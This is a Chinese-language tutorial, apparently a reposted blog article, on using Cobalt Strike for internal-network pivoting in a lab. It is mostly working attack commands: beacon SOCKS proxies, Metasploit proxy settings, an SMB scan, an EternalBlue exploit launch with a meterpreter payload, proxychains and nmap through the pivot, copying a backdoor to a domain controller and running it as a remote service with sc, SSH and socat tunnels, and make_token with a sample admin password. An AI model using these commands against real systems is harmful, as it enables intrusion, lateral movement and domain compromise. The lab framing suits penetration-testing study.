| CobaltStrike使用 | 您所在的位置:网站首页 › socks5 转发 › CobaltStrike使用 |
CobaltStrike使用
文章目录
流量转发Socks转发MSF 连接到 Socks 代理服务使用 ProxyChains 进行代理转发
转发监听器(反向链接)SSH隧道参考链接
本篇文章将会结合CS介绍在内网渗透中经常用到的隧道技术,这已经是第二次介绍隧道技术了,本篇环境将会比第一篇复杂,第一篇链接在这,
我是链接
流量转发
Socks转发
目前已经拿到了server2008-2的会话,但是域控主机在内网,不能和CS TeamServer直接通信,所以需要添加代理转发
在进行转发操作之前,需要将当前会话改为交互模式,也就是说输入命令就被执行,执行 sleep 0 即为交互模式 在当前 beacon 上可以右击选择 Pivoting --> SOCKS Server 设置一个 Socks4a 代理服务或者使用命令 socks [port] 进行设置使用命令 socks stop 关闭 Socks 代理服务在 View --> Proxy Pivots 中可以看到已经创建的代理服务 beacon> help socks Use: socks [stop|port] Starts a SOCKS4a server on the specified port. This server will relay connections through this Beacon. Use socks stop to stop the SOCKS4a server and terminate existing connections. Traffic will not relay while Beacon is asleep. Change the sleep time with the sleep command to reduce latency. MSF 连接到 Socks 代理服务设置 socks 代理
输入端口即可 或者用beacon命令 beacon> socks 8888 # 关闭命令 socks stopMetasploit 中进行设置 CS 中创建好代理后,在 Metasploit 中可以运行以下命令通过 beacon 的 Socks 代理进行通信 开启 Metasploit 后,运行 setg 命令 setg Proxies socks4:192.168.179.131:8888 setg ReverseAllowProxy true msf5 > setg Proxies socks4:192.168.179.131:8888 Proxies => socks4:192.168.179.131:8888如果感觉上面命令比较长,还可以在 Proxy Pivots 界面中点击 Tunnel 按钮查看命令。 运行以下命令来停止 unsetg Proxiessetg 命令和 unsetg 表示在 metasploit 中全局有效,不用在每次选择模块后再重新设置 扫描端口 扫描 10.0.0.0/24 地址段中的 445 端口 这里作为演示,只扫描一下 445 端口 use auxiliary/scanner/smb/smb_version set rhost 10.0.0.0/24 set threads 64 exploit漏洞发现&利用 如果10段内存在其他主机,且开放了端口,这里使用永恒之蓝作为演示 use exploit/windows/smb/ms17_010_eternalblue set rhosts 10.0.0.4 set payload windows/x64/meterpreter/bind_tcp exploit 使用 ProxyChains 进行代理转发使用 ProxyChains 可以使我们为没有代理配置功能的软件强制使用代理 1. 和MSF 使用socks 方法一致,首先开启一个 socks 代理服务 2. 配置 /etc/proxychains.conf 文件 3. 运行 proxychains + 待执行命令开启socks代理 beacon> socks 9527开启代理后再teamserver上可以看到端口(下图 socks 端口为8888)
配置 ProxyChains 在攻击机上,配置 /etc/proxychains.conf 文件的最后一行,根据当前攻击主机(Teamserver) IP 与设置的 Socks 端口,修改如下: vim /etc/proxychains.conf socks4 192.168.179.128 9527 # socks4 127.0.0.1 9527centos如果没有这个文件的话需要安装proxychains,安装方法,proxychains-ng 是 proxychains 的加强版 开始使用 ProxyChains 使用 Metasploit 的扫描可以知道,在 10.0.0.0/24 地址段中存在主机 10.0.0.2 ,接下来使用 nmap 扫描一下常见的端口,这里以 80,443,445,3389 作为演示 proxychains nmap -sT -Pn 10.0.0.2 -p 80,443,445,3389 proxychains-ng 版本命令为 proxychains4 # -sT:使用 TCP 扫描 -Pn:不使用 Ping -p:指定扫描端口 注:不加上 -sT -Pn 参数,将无法使用 proxychains 进行代理扫描
访问端口(假设开启了80端口) > proxychains curl 10.0.0.2 转发监听器(反向链接)
选择server2008-2会话,右击选择中转-Listener
这里的转发监听器就相当于server2008-2作为一个代理,当流量转发至server2008-1
生成可执行(s)后门,监听器选择转发监听器
将生成的后门文件上传到server2008-2目录下,这之前一样需要将后门复制到域控主机2008-1上(如果没有域控主机权限,要使用上一节获取信任方法拿到权限) shell copy file.exe \\host\C$\Windows\Temp # shell copy C:\Users\server20082\beacon.exe \\host\C$\Windows\Temp\beacon.exe按照之前的方法,先创建服务 beacon> shell sc \\host create name binpath= c:\windows\temp\file.exe # beacon> shell sc \\WIN-A9PLNLID2QM create beacon binpath= c:\windows\temp\s.exe启动服务 shell sc \\host start name # shell sc \\WIN-A9PLNLID2QM start beacon启动成功不会有报错,没有成功会有报错
执行成功后主机上线
上线之后在CS视图中可以看出反向连接和正向链接的区别
在内网中几乎所有的linux服务器和网络设备都支持ssh协议。一般情况下,ssh协议是允许通过防火墙和边界设备的,所以经常被攻击者利用。同时ssh协议的传输过程是加密的,所以我们很难区分合法的ssh会话和攻击者利用其他网络建立的隧道。攻击者使用ssh端口隧道突破防火墙的限制后,能够建立一些之前无法建立的TCP连接 适合于以下环境
外部 vps 可以访问内网web服务器,但是不能访问数据库服务器,内网web服务器可以和数据库服务器互相访问,这时就可以使用SSH隧道技术,先经过渗透测试拿到web服务器shell,以web服务器为跳板,访问数据库服务器的3389端口 接下来的实验使用另外一种拓扑结构,模拟企业内网钓鱼攻击场景
现在已经通过钓鱼攻击拿到了内网办公区区域的一台员工办公电脑
环境具体如下 web服务器具有双网卡,和数据服务器处于同一网段(10段)可以相互通信,和员工办公电脑处于同一网段可以相互通信(模拟)员工电脑不能和数据服务器通信因为员工电脑不能和数据服务器直接通信,我们可以借助 web 服务器(已经被拿下)搭建 ssh 隧道进行通信 1.在TeamServer上搭建ssh隧道 ssh -D 1080 user@ip # ssh -D 1080 [email protected]在本地创建动态端口1080进行转发连接到192.168.179.141
2.在TeamServer上开启445端口转发 访问本地445端口的数据会被转发到10.0.0.2 socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:10.0.0.2:4453.在cs中使用以下命令使数据服务器上线 make_token domainname\username password # beacon> make_token ocean\administrator Ocean@123
上线主机
整个流程如下
https://xz.aliyun.com/t/7245 https://wiki.wgpsec.org/knowledge/intranet/Cobalt-Strike.html
|
【本文地址】